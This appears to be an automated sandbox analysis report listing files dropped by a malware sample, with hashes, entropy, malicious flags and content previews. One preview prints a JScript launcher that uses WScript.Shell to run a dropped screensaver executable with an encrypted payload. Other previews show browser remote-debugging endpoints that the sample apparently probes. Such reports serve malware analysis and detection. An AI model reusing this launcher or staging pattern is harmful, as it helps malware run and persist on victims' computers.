Preview:	{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2278
Entropy (8bit):	3.8429175956860373
Encrypted:	false
SSDEEP:	48:uiTrlKxrgxPxl9Il8uatcE1+MCY1ULfxgC+d1rc:mGYe17kFgCV
MD5:	FA68E798825AF424DE664AAE8F6AC3CD
SHA1:	EACD763316EA3483FC03EFC28D60A3660DACE650
SHA-256:	11434402A275361D188704E4619EEC70FFB1D282A3453FAAE3E1523AA346A6B0
SHA-512:	DE636B263022B2421050E77C40802DCD5088CED8D7E8F788E36A8528D9C513E7A3BA10695B71EFEECDC6E13ABAC9CD54D84A1A2E46E3AE8CAA0240C68ABF71DE
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.O.S.m.x.a.A.s.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.O.r.8.X.n.J.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	9472
Entropy (8bit):	4.029456565655392
Encrypted:	false
SSDEEP:	192:aVpV8xuUArEcUI1wUYM0kNVQhaIGSeX2JFXcJ0vgJ:a7V4kQcR16MvkaLSe4FsJqgJ
MD5:	E8167073E7C941EE4C3AA8E054628601
SHA1:	12216895FD20C80E949F6D1BA559A8249197ACC1
SHA-256:	065141C060F907AA377AD6FB77ABB9DA256C0F99105D1B959355FCDF928AC1E4
SHA-512:	AD8CA09299A88080B65AC9ACA287D58D1E71D39D4E66588B0D030A032B91F358E97534C89EA734968C9C56772AC2155F250779AE781F09F112612851B264DF6B
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".q.G.K.q.3.G.l.L.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.O.r.8.X.n.J.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\json[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\646751\Plates.pif
File Type:	JSON data
Category:	dropped
Size (bytes):	3186
Entropy (8bit):	5.40218768893512
Encrypted:	false
SSDEEP:	96:6NnCxdSdHCxdkNnCiHCsNnCUbCSNnCLiT9CLMNnCE4ldgECEjNnCMC7NnCTjDCi:6N/N/NbNQiWMNq9NeNmb
MD5:	1F6B934BB90C2841F5F7DC63016178EC
SHA1:	6FEE711CAA536E4137FE743ADDF201CDE77DDE5B
SHA-256:	68F18C8723201F27D0C5799F0BB3F6EB8ADEF5BFFC7C86307A62343CD225854C
SHA-512:	5C865BC54240949BA670F91849699FF6798CE06F15EFD5BF7ACA50EB7B953CA4285C4C6AA83AF5ED83F386099B6D6238AA1E0C09C6086954CB58F9F4194D1CC0
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/7082C67CCAA4C027BEDB5028DDFB230C",.. "id": "7082C67CCAA4C027BEDB5028DDFB230C",.. "title": "CryptoTokenExtension",.. "type": "background_page",.. "url": "chrome-extension://kmendfapggjehodndflmmgagdbamhnfd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/7082C67CCAA4C027BEDB5028DDFB230C"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/0D62176CDCAAFB322A21CA0E7F855BAE",.. "id": "0D62176CDCAAFB322A21CA0E7F855BAE",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/0D62176CDCAAFB322A21CA0E7F855BAE"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=local

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\json[1].json

Download File

Process:	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr
File Type:	JSON data
Category:	dropped
Size (bytes):	1787
Entropy (8bit):	5.381490419238278
Encrypted:	false
SSDEEP:	48:SfNaoCtTECUfNaoCUCCfNaoCJCXfNaoCjD90UrU0U8Cjj:6NnCtTECANnCUCqNnCJCPNnCjD90UrUF
MD5:	0CBA1861C5510BB2743F1641A61B9C0C
SHA1:	5ED11BCDC6FCE230B6247918A06999D9005EA55B
SHA-256:	A728AEB7171250BC2EFDFDD756919BF803606BE8C30B2706F599F39A75EED353
SHA-512:	8DD0D26F1271A86794E7A1EBC0C479B8992B56D1D8306569CF3D04713DAC015DA99AAC9E3EA5BB004D0640BC493490C3AC3125568476CFE79E1A7E7BD3B99223
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/0AF856382D6850F6C390BA47ACC80D72",.. "id": "0AF856382D6850F6C390BA47ACC80D72",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/0AF856382D6850F6C390BA47ACC80D72"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/4112EBD12975D0BDF9478CB0E80D1A00",.. "id": "4112EBD12975D0BDF9478CB0E80D1A00",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/4112EBD12975D0BDF9478CB0E80D1A00"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js

Download File

Process:	C:\Users\user\AppData\Local\Temp\646751\Plates.pif
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	178
Entropy (8bit):	4.723848160219211
Encrypted:	false
SSDEEP:	3:RiMIpGXIdPHo55wWAX+6XRfL4EkD52OaCjNe+QP2FZo5uWAX+6XRfL4EkD52OaC5:RiJBJHonwWD6XRDJkDTaCpQP2FywWD6c
MD5:	DC1BAE31DFD2196652DDB248E3703BA5
SHA1:	7FB4C66EC0A0D72509FDB66E030CB538D0EDEC05
SHA-256:	EDADBE740BD3BE2E5C47EC1D61743C3FAD337E09843690F27147A6CBE1A2A1A9
SHA-512:	6238AACB20DE42723260414935C2BE220ACCFB02F823DB83DB063B1609F8D02DA4599476EBB0FACCCFEE358E6BC8BFF67BAE07EC54130FDEDBD168ACFE47B979
Malicious:	true
Preview:	new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\SkySync Technologies\\SkySync.scr\" \"C:\\Users\\user\\AppData\\Local\\SkySync Technologies\\e\"")

C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Download File

Process:	C:\Users\user\AppData\Local\Temp\646751\Plates.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	893608
Entropy (8bit):	6.62028134425878
Encrypted:	false
SSDEEP:	12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5:	18CE19B57F43CE0A5AF149C96AECC685
SHA1:	1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256:	D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512:	A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\SkySync Technologies\e

Download File

Process:	C:\Users\user\AppData\Local\Temp\646751\Plates.pif
File Type:	data
Category:	dropped
Size (bytes):	1190710
Entropy (8bit):	7.999848190425111
Encrypted:	true
SSDEEP:	24576:2UmZRnwr5zk6/p5WEBJCnlJfm6p5MlP/zlGtmQtx/hkyHF:ep6/pslfvp27yVBF
MD5:	E9040D6E82FFA0F28CECFB9C4CEDC0EA
SHA1:	0C899A8A0B527E4F9D8542FACFAE9C73FF2C2595
SHA-256:	CF1C104480409DEA5F86C6F0323EF71232AB062B7E719A7A10E2B69A3412F1A5
SHA-512:	9F5E8C989C2A0BA8EF133AD7C95A6B70A849BFE5CA5F7F46EA9E9DCDD568800F9393C884DEF0FDE00DC60D26251F8A81E65EFF826555B0B6102FAEAF4F890933
Malicious:	true
Preview:	..k:..z8...g..\|V.0g.J.H.m[...a.V...m.^...d...[.&....U.S..m......1.H8.]C.......c7[..G...x!..........oL,....#..:.....\|E.....j}F.L...pf.s.`.lD.q..\|<....WGXh.G..@&.....G..4...^.L.....3._g).p.,!.PF.4]..5z.........h..6B\....9Q)..gc.....t..O}L.@4T%.,...W4..v.)....?......._..h._...E.aI.s..O..e.ta..n&Q).%q.J.@...+.ZJ.....J..BR. .F.....;.p)0...9;..W...1=.+./Q..xn%...{F..Lq....8....p.>S{.;.(..x.T,...Db.Hre.B./..&;.w.....Y?].s-.O..wN.XZ'D.88~.VN..'Ku....#ac.8!.T..b.i...r....3...Jw(~..{..4..E..F)_..y..j..o...Z.......@.i%.,mt...m.E....,...D..7.m\|S...j.z.L.`.f]...........$.$....^......:.3..Fz)..n.V.+A).KU]'..]..Ww.B.q.`..M1..K.$.7..S}....R&..z"Ya.TX_..x_..Z..Z.B%2....:.Z...d..}...X.6...{siV.....H.Vg....<..$d...U..M..'.n?.=....n.'.l/:..c.lW..M...uK...`M........o.@..!o.0...s..,"...B...T.....:jb.qA5Hl.../d..2..U...x........B...b.....`../...s.`.~FY.....s...8....~x5^^....v.9.;S.T..T.w....?.._.....+0 M.N..F._;...Ia...]>..-...g.FAf#..{.).)....I.Q<p..@..D.*VU."...

C:\Users\user\AppData\Local\Temp\646751\Plates.pif

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	893608
Entropy (8bit):	6.62028134425878
Encrypted:	false
SSDEEP:	12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5:	18CE19B57F43CE0A5AF149C96AECC685
SHA1:	1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256:	D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512:	A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\646751\c

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	1190710
Entropy (8bit):	7.999848190425111
Encrypted:	true
SSDEEP:	24576:2UmZRnwr5zk6/p5WEBJCnlJfm6p5MlP/zlGtmQtx/hkyHF:ep6/pslfvp27yVBF
MD5:	E9040D6E82FFA0F28CECFB9C4CEDC0EA
SHA1:	0C899A8A0B527E4F9D8542FACFAE9C73FF2C2595
SHA-256:	CF1C104480409DEA5F86C6F0323EF71232AB062B7E719A7A10E2B69A3412F1A5
SHA-512:	9F5E8C989C2A0BA8EF133AD7C95A6B70A849BFE5CA5F7F46EA9E9DCDD568800F9393C884DEF0FDE00DC60D26251F8A81E65EFF826555B0B6102FAEAF4F890933
Malicious:	true
Preview:	..k:..z8...g..\|V.0g.J.H.m[...a.V...m.^...d...[.&....U.S..m......1.H8.]C.......c7[..G...x!..........oL,....#..:.....\|E.....j}F.L...pf.s.`.lD.q..\|<....WGXh.G..@&.....G..4...^.L.....3._g).p.,!.PF.4]..5z.........h..6B\....9Q)..gc.....t..O}L.@4T%.,...W4..v.)....?......._..h._...E.aI.s..O..e.ta..n&Q).%q.J.@...+.ZJ.....J..BR. .F.....;.p)0...9;..W...1=.+./Q..xn%...{F..Lq....8....p.>S{.;.(..x.T,...Db.Hre.B./..&;.w.....Y?].s-.O..wN.XZ'D.88~.VN..'Ku....#ac.8!.T..b.i...r....3...Jw(~..{..4..E..F)_..y..j..o...Z.......@.i%.,mt...m.E....,...D..7.m\|S...j.z.L.`.f]...........$.$....^......:.3..Fz)..n.V.+A).KU]'..]..Ww.B.q.`..M1..K.$.7..S}....R&..z"Ya.TX_..x_..Z..Z.B%2....:.Z...d..}...X.6...{siV.....H.Vg....<..$d...U..M..'.n?.=....n.'.l/:..c.lW..M...uK...`M........o.@..!o.0...s..,"...B...T.....:jb.qA5Hl.../d..2..U...x........B...b.....`../...s.`.~FY.....s...8....~x5^^....v.9.;S.T..T.w....?.._.....+0 M.N..F._;...Ia...]>..-...g.FAf#..{.).)....I.Q<p..@..D.*VU."...

C:\Users\user\AppData\Local\Temp\Baby

Download File

Process:	C:\Users\user\Desktop\JHPvqMzKbz.exe
File Type:	data
Category:	dropped
Size (bytes):	83968
Entropy (8bit):	7.997873882140977
Encrypted:	true
SSDEEP:	1536:taXreUKHN9P7e1TEC7fG/FEhMYOsMpWCbxegZC8fAcUX:taXreBHzcECT9dOsEtdZCcAcY
MD5:	EE7C47686D35A3E258C1F45053CC75AB
SHA1:	72341F88C79D79CB44EF60FC33783B9F14FF1EE8
SHA-256:	B199BA689F6B383644345854C758629B925F9CB853C0E4E1DCB4D0F891BE5EBA
SHA-512:	F007C9C101650842DD7B57310D22A0C04FA1FA71F1388285F55FE9CC0B70DBE7A1964ACE594793BD707DB07C3EA4911BFD21C458993B1BEC8FA155250DAC2471
Malicious:	true
Preview:	.u......}......l.7.U./).\....../..M.>._o...d......l......lc.....q......._v..z........d....T,,..sg...P&....%2...x..IF..:..#...[\.;..R.........yZ.}k.?.!.=!U.....0[,.V..Q;..2%\.Ud..'D.l..U.wr.,.g.....D........?TCd..{NK.h\|M.......O...r.....htU.J.........d....u.z.=W.c.-..-........o...\.A.$TI.G.p.).3.M..t..v..\|Ps#....e4...&..2..\D....u.u....6C....\|.....41n..z..fw..v1}u..Tq...1......k.V.....L......B[..4.>}\...n....7S...T2e~...e.@.]g0\......%... Jh<v.YB..n..q........i}`.5..3.4V]./...'P..X.At.-\{..".cs.Ui[s...mz...'b....Q..w.\|<..C.M...n.........~K..@k.Q>.....9:...gX.".w:.s....T.....z.J.${.......=.....L..'9.I...n+5.r....&...%.}O..?M\|e............LH........4.[.........V.)..R...8..y........ET\.b...Y.....q_..V.b...b}.t...w...... u$5...-....c.+jq{.A......./\I..H.yY^..K..Lf.P.B+.Sks.E:Q.B7...5.l2xi(.....P..E........~4U8C}?..~....C....T".@..r..J)...n......6.......[.D.N{.+3....[......#2.."...q_.h..o-.c....{Y..j.&.....l.Y...-uGV.P4.`.j........ .o/,....>Hp

C:\Users\user\AppData\Local\Temp\Bar

Download File

Process:	C:\Users\user\Desktop\JHPvqMzKbz.exe
File Type:	data
Category:	dropped
Size (bytes):	62464
Entropy (8bit):	7.9969942800850715
Encrypted:	true
SSDEEP:	1536:G40pS9a33G/WXZtlqWL/fm/unJtjzt4Im1EQ7g:G40Qam/WhqWi/su1Zg
MD5:	B01F3D096606E9762D0A6B305163C763
SHA1:	95C3623AD2693CFFF27BC1F2FA60E5FB3292F4D7
SHA-256:	ADACDC0798ACBC5BEC0377956876C8B94B52528F51BB998C1F7F1CD2F0DB5088
SHA-512:	99E4FB8914A35396395638EB1542FB096FF3CB9CE56258E89350FE49738344819E707A3AA4C9731F02A47DA5432A6EC96C42C121B1E8A7113E8AAFF250C27B58
Malicious:	true
Preview:	.d..70.QB.m..4b.Q...f..E.b4L..".M......u;Y#...._#.x...0!3..9.7eD..[..x....^A......F..I...3d.#O...m..)...s.:.d..J...vf..w..<.3..M.A.....o.g....o.D....LN.Vf...w....Jr...6/..+l..4..Ap...?S;..C........V.....%...z..L0.H..&........B037.F\|.....\...]...c.3...~.Y.xV.......d......+....&.w$...k..1..Ngl.....L.Y...F6...H@.8K.c.JN.k&.$..Pm.I..j.D<!..D..q.S.>3.`sp....[...Wb.O....G....z.Y@...... .....'.......v.z...q.Y.P.Z\|.....po\|.......E.w>\|.......~0...E..I..7!...sm..6.b...r\|......)................s..L...G.\.7g.y~...u:5..z.O...A779.......x......?[H[.~.8.....mJC..,P.....r.KO.J.P&..#..n.?....p;..%.....6.J...r..O...... .cb.t.H[...V...a[./..Kp.{P.]...%..5.Pj....B.D...2.A.;.C......m}R..a.. .>.{.C.T.c..[.M.k.A.Cnf[.T.N#..]....VB.....k..B...G......A.O.......mU.....F.(.........>W.(.F..M...r,....H.@..M...X...Z%.e.R..1v*i.(....._.V64..\|.).......,n~..?.!.F.. ..B$6.......-.....C..G.p.k......h..t.x....E1...._4b....._I....Q.....s.r.=....<....Y....G.mU}m....!_.8

C:\Users\user\AppData\Local\Temp\Bull

Download File

Process:	C:\Users\user\Desktop\JHPvqMzKbz.exe
File Type:	data
Category:	dropped
Size (bytes):	6966
Entropy (8bit):	7.971012325446702
Encrypted:	false
SSDEEP:	192:r2nWWbUoWwVg+g7Sgsdo7akiB76mTi6zbCwX:qWkWF+c5sm7A76mTbCS
MD5:	BCA7D728D907C651E17CE086FE7E56FF
SHA1:	B91DB7B274CF33C643C33EDC13EC122564D798DE
SHA-256:	F837E6522CF5992ED8C1F016C95F84948A83C891294E1AEBF0688E3275D3C593
SHA-512:	34EC6AF89EBE2C3625DCFB4961DF148BD57042084A252D352837663E6A1AAA097A82A7138211A73A046F3B2EEA7C459FAAA80B22CF9098805F46548926F3B8C3
Malicious:	false
Preview:	6.$.2Wz.O.!.......5>...]gMK.8n...Y^...(M...z....H.cU .+.S..;M_Lf....F.4Js,.J..8\.8.....+..0...D;.%.B.S..~k.H.....>.v..N..[A(O..}..#...`.o....N(.an._.Y....li.1.F......d1..?.#..a.^. ..\...L.[%...5.Q4.C.)%.].}6..h..G.+..<.<.....#........[.8.>Y.%.)4.n......E..J...@......[.I?.../.......-..\5U.../...Y..~.....k.."#.I1N.^m...4.......U5.C...t..W.q..B.........AR.5s/.c.q>KOu.....u.>,.>....`..F.K............%..e.j.WB="@......z5<.%..r.n...].].n.r...L..O.,\|....<U.g.F$.,..\.J.H%~.@.....ZV4....MZ.0.ipkIS..)wZ.av....j.^gg...?~......_....U.\|..)..X...? `2.....KJN......OH.i.mt...~..S.K.....C..kx.d..<...:0....`m......Lx-N>.W..upmr.c.......JP,.....~@..G..c.K.....$..,._..:[69N...R+./...:..9L.I.L..Kz/U..i......;..1]...T...>3........a.G....@e.h.0C+..u..y....z..*. ..!..P:.e..3.e.{...s.\<....V.7.s.r<..sQ.C..1.;.~.oH"...gp..._..b!x....8..Rk....d..t..y..e._..#D.p.3.N^.Tk...0....8...'...u.Pd,....J $...].B-O....g.+#.d..K...J[..$( ..mk...C....^m...K._V.H...

C:\Users\user\AppData\Local\Temp\Care

Download File

Process:	C:\Users\user\Desktop\JHPvqMzKbz.exe
File Type:	data
Category:	dropped
Size (bytes):	887060
Entropy (8bit):	6.622156696291121
Encrypted:	false
SSDEEP:	12288:QV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:yxz1JMyyzlohMf1tN70aw8501
MD5:	C1F370FFAAEA402A8C74C0987B2844DD
SHA1:	751F94EBCBEA6A4D62BF382F18CF83156B57BA44
SHA-256:	3BA807E13102E920B109E89933B2B7FCD0612778DAD22F9FB3B0B70F680DC573
SHA-512:	92DFAC93BF8CC7F22F0043C4EE36BE0E63057242584C238E6625666A24D4A38E736BE1910BE3EEEF14EF3573154C16750BD99A9F5BE933B25D757D6715C86456
Malicious:	false
Preview:	...wL..u....]......j....E....(.I..{L...t..{L.....}....$xL.......KH..yi..........wq....&@..$.e&@..E...........}....{L.uUj...(.I.P.u... .I..}........j..u...8.I.j.....I._^[..]..........t....j...........E...sL.k.C.P&@.W&@..%@...C..%@.W&@................................U..8xL.....M.....t...9.t..@...M..J....@...]...Q.M..E.......H.I..E..8xL..E.P......E...U..M....t.W.}......N..._]...U..QQSVW.}..E.P..7....I..E...l....E...p....E.PV..p.I..M..E.;.t...uc;.x...u[.s..5..I....s........E.......E....;.\|.....a....}..t...\|...;............}..t......._^[..]....}....t.....x...\|......U...M.VW...........\|P;......H.Bt.......t<.u..@....M.....B`....8.t".....\|.;........Bt....8.t..._^]...2...U..V..W.}.;............Ft.......t.Q.?....Ft.... .......;.....u?...\|..Ft......8.u.O......}..........Nx.Nx.Ft.4......FtY.Nx.$...~x.v..Nx.Ft.D...8.t._^]..................j...U..Q..(xL.VW9.0xL.un.=4xL...........h.........Y..................E..}.P. xL......54xL.F.54xL...$xL.....0xL.....9.M..I..O._^..]...j.^3.;.~...$xL...

C:\Users\user\AppData\Local\Temp\Clearance

Download File

Process:	C:\Users\user\Desktop\JHPvqMzKbz.exe
File Type:	data
Category:	dropped
Size (bytes):	60416
Entropy (8bit):	7.996638028191468
Encrypted:	true
SSDEEP:	1536:j88sN/QY0lJTHupxUV+F7UFFZdn8HsbacPp:wFQYwExUV+F7sFZdn8HUhp
MD5:	11BBE9E6529811962D78CAB3D0EE1C43
SHA1:	F96714A4791C2F655C6ABF7288474C07DD48BC84
SHA-256:	7CB10878D4544E53CA4730AB78C244F2E46ED76A7D1329C5C0E01FEF8204CCA3
SHA-512:	D6FD22A48A1F8D725D921A59EE4DDBA149235A329D6EA70DDE8E956C080823C38479D2702B7CBA27A4C0E7FBB9D028C0E876AE2F0D2F6DCED8AD8EC8E179BAF8
Malicious:	true
Preview:	..>.~..D............:.....m....\(N...P..D5AH.....A<$.3....b).....Q.x..),...S..r...y..p4.."....S.;.P....5.p;.......7.0'LR.....=....G..sA......u.["..K.......-..d=...b.K9>..H`b.p.L.h...9..L75_o...A....K.p.xk.!>L.D..D.v.H....$D.4._...t...)...X......`.0...R....[..rWth.....iMW.....`u).j.=..s..m^..X+..(..L&.E.....y. 1.6.P.w}LA..wK......{.].o...gj4.C...<...g....F..y=g...,.=7J.....%..I..n0...<....M...e.:..G...c...P.[.... ...1.....'v.../.}......@J.S....D.z.a{..7..mH.Y13.R.Ok...}..A.._i..]..8......].g..l!....a..tp......XW...z......N5.A.`...G.y.(U..s5N}.$.U...xv....h731.I....I^...6v.+.b..._...f.nh...._.{.LF.....{...41.[........z..F...rF.e....R\/..e........d0&..."...Ei..Ys...!t0......t8............~.3P..P...]....J....s>@%Y.~.A......ah..2c...S."...r..P.#/......cW..c.KV.......}.z.8.._BX....1....\u.L.+;.J ....b... "f.....>kx.k...%.W.`eb..... ......2...@m..I...Y..gL.p..8..l%..Z..+....)..].V0ol.[m...W.....Fx......q.=..Ne$.T.......mG.x.i0......`...

C:\Users\user\AppData\Local\Temp\Continental

Download File

Process:	C:\Users\user\Desktop\JHPvqMzKbz.exe
File Type:	data
Category:	dropped
Size (bytes):	97280
Entropy (8bit):	7.997951284123016
Encrypted:	true
SSDEEP:	1536:5QVV/ejgesxH8VHvK01SXiDhZl4UECy6//oGmBx6LpdiFGXy5h+aFxcnZ7uRQlF0:oejgesxH2b1SXiDhf4PCy6Yxx6LTgGXe
MD5:	ECF9598497596BDE26D0AD70777D6D75
SHA1:	5225AA0982DC031C7361B72CDEFF4B7E373F983E
SHA-256:	013836F48C6A0B07DCFBA2E219D0E5E4733F6959B9C683F2C7DDF213C973B18B
SHA-512:	26D8E83F6B215A15C87F1EA4355502964CC84C3E991C7C93B47C977B9BFAA17248D7D8A8A8122E80D0187C5B63C831FDA65CD7BCF0CA2299A13A2663286183FE
Malicious:	true
